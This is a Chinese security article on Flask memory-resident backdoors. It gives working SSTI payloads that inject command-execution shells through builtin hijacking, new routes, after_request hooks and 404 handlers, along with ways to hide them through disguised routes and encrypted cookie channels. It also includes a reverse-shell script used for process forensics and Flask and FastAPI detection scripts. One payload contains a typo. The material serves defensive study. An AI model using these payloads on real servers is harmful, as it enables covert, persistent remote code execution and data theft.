浅谈Flask内存马中的攻与防
字数 386 2025-08-22 12:23:36
Flask内存马攻防技术详解
一、Flask内存马攻击技术
1. 函数劫持式内存马
通过劫持Python内置函数实现持久化后门,适用于各种Python后端框架:
{{lipsum.__globals__['__builtins__']['exec']("global original_open
original_open=globals()['__builtins__']['open']
def custom_open(*args,**kwargs):
from flask import request
if request.query_params.get("cmd"):return __import__('io').StringIO(__import__('os').popen(request.query_params.get("cmd")).read())
else:return original_open(*args,**kwargs)
globals()['__builtins__']['open']=custom_open")}}
特点:
- 劫持
open()函数实现命令执行 - 不影响正常文件操作
- 可通过
cmd参数传递命令
2. 添加路由式内存马(Flask高版本)
# 第一步:添加URL规则
url_for.__globals__['__builtins__']['eval'](
"app.url_map.add(
app.url_rule_class('/shell', methods=['GET'], endpoint='shell')
)",
{
'app':url_for.__globals__['current_app']
}
)
# 第二步:添加视图函数
url_for.__globals__['__builtins__']['eval'](
"app.view_functions.update(
{
'shell': lambda:__import__('os').popen(
app.request_context.__globals__['request_ctx'].request.args.get('cmd', 'whoami')
).read()
}
)",
{
'app':url_for.__globals__['current_app']
}
)
3. after_request式内存马
{{url_for.__globals__['__builtins__']['eval']("app.after_request_funcs.setdefault(None, []).append(lambda resp: CmdResp if request.args.get('cmd') and exec(\"global CmdResp;CmdResp=__import__(\'flask\').make_response(__import__(\'os\').popen(request.args.get(\'cmd\')).read())\")==None else resp)",{'request':url_for.__globals__['request'],'app':get_flashed_messages.__globals__['current_app']})}}
4. 错误触发式内存马
{{url_for.__globals__['__builtals__']['exec']("global exc_class;global code;exc_class,code=app._get_exc_class_and_code(404);app.error_handler_spec[None][code][exc_class] = lambda error:__import__('os').popen(request.args.get('qwq')).read()", {'request':url_for.__globals__['request'],'app':get_flashed_messages.__globals__['current_app']})}}
二、内存马隐匿技术
1. 伪装常见路由
url_for.__globals__['__builtins__']['eval'](
"app.view_functions.update(
{
'api/user/log': lambda:__import__('os').popen(
app.request_context.__globals__['request_ctx'].request.args.get('cmd', 'whoami')
).read()
}
)",
{
'app':url_for.__globals__['current_app']
}
)
2. 加密参数传递
{{url_for.__globals__['__builtins__']['exec']("global exc_class;global code;exc_class,code=app._get_exc_class_and_code(404);app.error_handler_spec[None][code][exc_class] = lambda error: __import__('os').popen(__import__('base64').b64decode(request.cookies.get('userinfo')).decode('utf-8')).read()", {'request':url_for.__globals__['request'],'app':get_flashed_messages.__globals__['current_app']})}}
3. 高级加密方案
global exc_class
global code
from itsdangerous import URLSafeSerializer
from flask import request
import json
exc_class, code = app._get_exc_class_and_code(404)
secret_key=''.join(chr(ord(a) ^ ord(b)) for a, b in zip('M8):M2uY[2%<^4+',',M[U?SX4>_VT;XG'))
def execute_command(cmd,secret_key):
serializer = URLSafeSerializer(secret_key)
encrypted_userinfo=cmd
if not encrypted_userinfo:
return
try:
command = serializer.loads(encrypted_userinfo)
except Exception as e:
data = {
'status': 'error',
'message': 'Decryption failed',
'result': ''
}
try:
result=None
eval(command)
except Exception as e:
data = {
'status': 'error',
'message': str(e),
'result': ''
}
data = {
'status': 'ok',
'result': serializer.dumps(result)
}
return json.dumps(data)
app.error_handler_spec[None][code][exc_class] = lambda error: execute_command(request.cookies.get('userinfo'), secret_key)
三、防御与检测技术
1. 内存取证技术
使用pyrasite库注入Python反向shell:
#!/usr/bin/env python3
import socket
import sys
import os
import code
def reverse_python_shell(target_ip, target_port):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_ip, target_port))
sock_file = sock.makefile("rw")
sys.stdin = sock_file
sys.stdout = sock_file
sys.stderr = sock_file
shell = code.InteractiveConsole(globals())
shell.interact()
except Exception as e:
try:
sock.sendall(f"Error: {str(e)}\n".encode())
finally:
sock.close()
if __name__ == "__main__":
target_ip = "192.168.239.199"
target_port = 4444
reverse_python_shell(target_ip, target_port)
注入命令:
pyrasite (pgrep -f "python3") shell-rev-py.py --verbose
2. 内存马检测技术
检测errorhandler内存马
global exc_class;global code;exc_class,code=app._get_exc_class_and_code(404);
memshell=app.error_handler_spec[None][code][exc_class]
import dis
dis.dis(memshell)
检测before/after_request内存马
app.after_request_funcs
app.before_request_funcs
检测路由内存马
for rule in app.url_map.iter_rules():
print(f"Endpoint: {rule.endpoint}, Methods: {rule.methods}, Rule: {rule.rule}")
使用inspect模块检测
import inspect
suspicious_function = app.view_functions["test"]
print("Function name:", suspicious_function.__name__)
print("Source file:", inspect.getfile(suspicious_function))
print("Source code:", inspect.getsource(suspicious_function))
3. 综合检测脚本
#!/usr/bin/env python3
import sys
import os
import base64
import dis
import inspect
from collections import defaultdict
OUTPUT_FILE = "/tmp/flask_memshell_analysis.txt"
def save_to_file(data):
with open(OUTPUT_FILE, "a") as f:
f.write(data + "\n")
def analyze_function(func, description):
try:
bytecode = func.__code__.co_code
bytecode_b64 = base64.b64encode(bytecode).decode()
disassembled = dis.Bytecode(func)
disassembled_str = "\n".join([f"{instr.opname} {instr.argrepr}" for instr in disassembled])
save_to_file(f"=== {description} ===")
save_to_file(f"Function: {func.__name__}")
save_to_file(f"File: {inspect.getfile(func)}")
save_to_file(f"Base64 Bytecode: {bytecode_b64}")
save_to_file(f"Disassembled Bytecode:\n{disassembled_str}\n")
except Exception as e:
save_to_file(f"Error analyzing function {func}: {str(e)}\n")
def check_dynamic_routes(app):
save_to_file("=== Dynamic Routes ===")
try:
for rule in app.url_map.iter_rules():
func = app.view_functions[rule.endpoint]
save_to_file(f"Endpoint: {rule.endpoint}, Methods: {rule.methods}, Rule: {rule.rule}")
analyze_function(func, f"Route Function ({rule.endpoint})")
except Exception as e:
save_to_file(f"Error checking routes: {str(e)}\n")
def check_before_request(app):
save_to_file("=== Before Request ===")
try:
for func in app.before_request_funcs.get(None, []):
analyze_function(func, "Before Request Function")
except Exception as e:
save_to_file(f"Error checking before_request: {str(e)}\n")
def check_after_request(app):
save_to_file("=== After Request ===")
try:
for func in app.after_request_funcs.get(None, []):
analyze_function(func, "After Request Function")
except Exception as e:
save_to_file(f"Error checking after_request: {str(e)}\n")
def check_error_handlers(app):
save_to_file("=== Error Handlers ===")
try:
for code, handler_map in app.error_handler_spec[None].items():
for exc_class, func in handler_map.items():
analyze_function(func, f"Error Handler ({exc_class}, {code})")
except Exception as e:
save_to_file(f"Error checking error handlers: {str(e)}\n")
def main():
save_to_file("=== Flask Memory Shell Analysis ===")
save_to_file(f"Injected into process PID: {os.getpid()}\n")
if 'app' not in globals():
save_to_file("Error: No 'app' variable found in globals.\n")
return
app = globals()['app']
save_to_file(f"Flask app detected: {repr(app)}\n")
check_dynamic_routes(app)
check_before_request(app)
check_after_request(app)
check_error_handlers(app)
save_to_file("=== Analysis Complete ===\n")
if __name__ == "__main__":
main()
4. FastAPI内存马检测
import sys
import inspect
from fastapi.routing import APIRoute
from starlette.middleware.base import BaseHTTPMiddleware
def detect_middleware_injection(app):
print("=== Checking Middlewares ===")
for index, middleware in enumerate(app.user_middleware):
try:
dispatch_func = middleware.options.get("dispatch", None)
if dispatch_func:
print(f"Middleware {index}: {middleware.cls.__name__}")
print(f"Dispatch function: {dispatch_func}")
if inspect.isfunction(dispatch_func):
source_file = inspect.getfile(dispatch_func)
if source_file == "<string>":
print(f" [ALERT] Middleware {index} has dynamically defined dispatch function!")
print(f" Function source: {inspect.getsource(dispatch_func)}")
else:
print(f" Source file: {source_file}")
except Exception as e:
print(f"Error analyzing middleware {index}: {e}")
def detect_route_injection(app):
print("=== Checking Routes ===")
for route in app.routes:
if isinstance(route, APIRoute):
endpoint = route.endpoint
try:
source_file = inspect.getfile(endpoint)
if source_file == "<string>":
print(f" [ALERT] Route {route.path} has dynamically defined endpoint!")
print(f" Endpoint source: {inspect.getsource(endpoint)}")
else:
print(f" Route {route.path} -> Endpoint: {endpoint.__name__}")
print(f" Source file: {source_file}")
except Exception as e:
print(f"Error analyzing route {route.path}: {e}")
def main():
if "app" not in sys.modules["__main__"].__dict__:
print("Error: No FastAPI app instance found in the main module.")
return
app = sys.modules["__main__"].__dict__["app"]
print(f"Detected FastAPI app: {app}")
detect_middleware_injection(app)
detect_route_injection(app)
if __name__ == "__main__":
main()